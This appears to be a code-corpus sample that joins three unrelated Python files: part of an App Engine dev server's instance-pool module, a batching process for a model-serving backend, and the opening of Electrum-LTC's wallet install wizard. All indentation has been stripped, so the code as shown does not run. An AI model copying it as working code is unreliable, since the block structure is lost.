"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503, _TIMEOUT_HTML)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
return _THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command e.g. "localhost".
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI-environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raises is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed-out while waiting for another one to complete']
def restart(self):
"""Restarts the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ', str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
|
batcher_process.py
|
import logging
import os
import pickle
import time
import json
import cv2
import copy
import numpy as np
from abc import ABC, abstractmethod
from typing import Dict
from configs import NXS_CONFIG
from nxs_libs.interface.backend.input import (
BackendInputInterfaceFactory,
)
from nxs_libs.interface.backend.output import (
BackendOutputInterfaceFactory,
)
from nxs_types.infer_result import NxsInferStatus
from nxs_types.model import (
NxsModel,
)
from nxs_types.nxs_args import NxsBackendArgs
from nxs_types.scheduling_data import NxsSchedulingPerComponentModelPlan
from nxs_utils.logging import NxsLogLevel, setup_logger, write_log
class BackendBatcherProcess:
def __init__(
self,
args: NxsBackendArgs,
component_model: NxsModel,
component_model_plan: NxsSchedulingPerComponentModelPlan,
input_interface_args: Dict,
output_interface_args: Dict,
stop_flag,
next_process_stop_flag,
extra_params: Dict = {},
) -> None:
self.component_model = component_model
self.component_model_plan = component_model_plan
self.input_interface_args = input_interface_args
self.output_interface_args = output_interface_args
self.stop_flag = stop_flag
self.next_process_stop_flag = next_process_stop_flag
self.extra_params = extra_params
self.p = None
self.preproc_fn = None
self.preproc_extra_params = {}
try:
self.preproc_extra_params = json.loads(
self.component_model.model_desc.extra_preprocessing_metadata
)
except:
pass
self.log_prefix = "{}_BATCHER".format(component_model.model_uuid)
self.log_level = os.environ.get(NXS_CONFIG.LOG_LEVEL, NxsLogLevel.INFO)
self.next_topic_name = "{}_COMPUTE".format(component_model.model_uuid)
setup_logger()
# def _log(self, message):
# write_log(self.log_prefix, message, self.log_level)
def _log(self, message, log_level=logging.INFO):
logging.log(log_level, f"{self.log_prefix} - {message}")
def run(self):
from multiprocessing import Process
self.p = Process(target=self._run, args=())
self.p.start()
def _run(self):
cross_requests_batching = self.component_model.cross_requests_batching
max_latency = 1 # in secs
max_batch_size = self.component_model_plan.batch_size
for profile_unit in self.component_model.profile:
if profile_unit.batch_size == max_batch_size:
max_latency = profile_unit.latency_e2e.max / 1000.0 # in secs
break
self.input = BackendInputInterfaceFactory.create_input_interface(
**self.input_interface_args
)
self.output = BackendOutputInterfaceFactory.create_input_interface(
**self.output_interface_args
)
current_batch = []
current_metadata_batch = []
waiting_t0 = time.time()
to_exit = False
tt0 = time.time()
requests_count = 0
while True:
items = []
if not self.stop_flag.value:
items = self.input.get_batch()
else:
items = self.input.close_and_get_remains()
to_exit = True
for item in items:
preprocessed_data, metadata = item
current_batch.append(preprocessed_data)
current_metadata_batch.append(metadata)
if len(current_batch) == 1:
waiting_t0 = time.time()
if not cross_requests_batching or len(current_batch) >= max_batch_size:
requests_count += len(current_batch)
# transform batch to {key -> []}
transformed_batch = {}
for item in current_batch:
for tensor_name in item:
if not tensor_name in transformed_batch.keys():
transformed_batch[tensor_name] = []
transformed_batch[tensor_name].extend(item[tensor_name])
# for metadata in current_metadata_batch:
# self.request_exiting(metadata["extra"])
self.output.put_batch(
self.next_topic_name,
[(transformed_batch, current_metadata_batch)],
)
current_batch = []
current_metadata_batch = []
if current_batch and cross_requests_batching:
# wait for a bit if the batch is not full
if time.time() - waiting_t0 > max_latency / 2:
requests_count += len(current_batch)
# transform [{key -> item}] into {key -> [items]}
transformed_batch = {}
for item in current_batch:
for tensor_name in item:
if not tensor_name in transformed_batch.keys():
transformed_batch[tensor_name] = []
transformed_batch[tensor_name].extend(item[tensor_name])
for metadata in current_metadata_batch:
self.request_exiting(metadata["extra"])
self.output.put_batch(
self.next_topic_name,
[(transformed_batch, current_metadata_batch)],
)
current_batch = []
current_metadata_batch = []
if time.time() - tt0 > 5:
if requests_count > 0:
fps = requests_count / (time.time() - tt0)
print("batcher", "fps", fps)
requests_count = 0
tt0 = time.time()
if to_exit:
break
if not items:
time.sleep(0.01)
# trigger next process to stop
self.next_process_stop_flag.value = True
self._log("Exiting...")
def stop(self):
self.stop_flag.value = True
self.p.join()
def request_exiting(self, extra_metadata: Dict):
preprocessing_t0 = extra_metadata[self.component_model.model_uuid].pop(
"preprocessing_t0"
)
extra_metadata[self.component_model.model_uuid]["preprocessing_lat"] = (
time.time() - preprocessing_t0
)
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum_ltc.wallet import Wallet, Abstract_Wallet
from electrum_ltc.storage import WalletStorage
from electrum_ltc.util import UserCancelled, InvalidPassword, WalletFileException
from electrum_ltc.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_ltc.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum_ltc.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:T4PsyoR5gC8B... \t-> LXqi2tzER...\n' +
'p2wpkh-p2sh:T4PsyoR5gC8B... \t-> MUuWxSpVC...\n' +
'p2wpkh:T4PsyoR5gC8B... \t-> ltc1q3fjf...')
# note: full key is T4PsyoR5gC8BGEoTe8So7YQWPnvdkqTJqRVpLoMmZVqBsunDdeuJ
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
run_next(*out)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
return
else:
wizard.close()
raise
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum-LTC - ' + _('Install Wizard'))
self.app = app
self.config = config
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum-ltc.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-LTC wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
self.logger.exception('')
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None) #
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
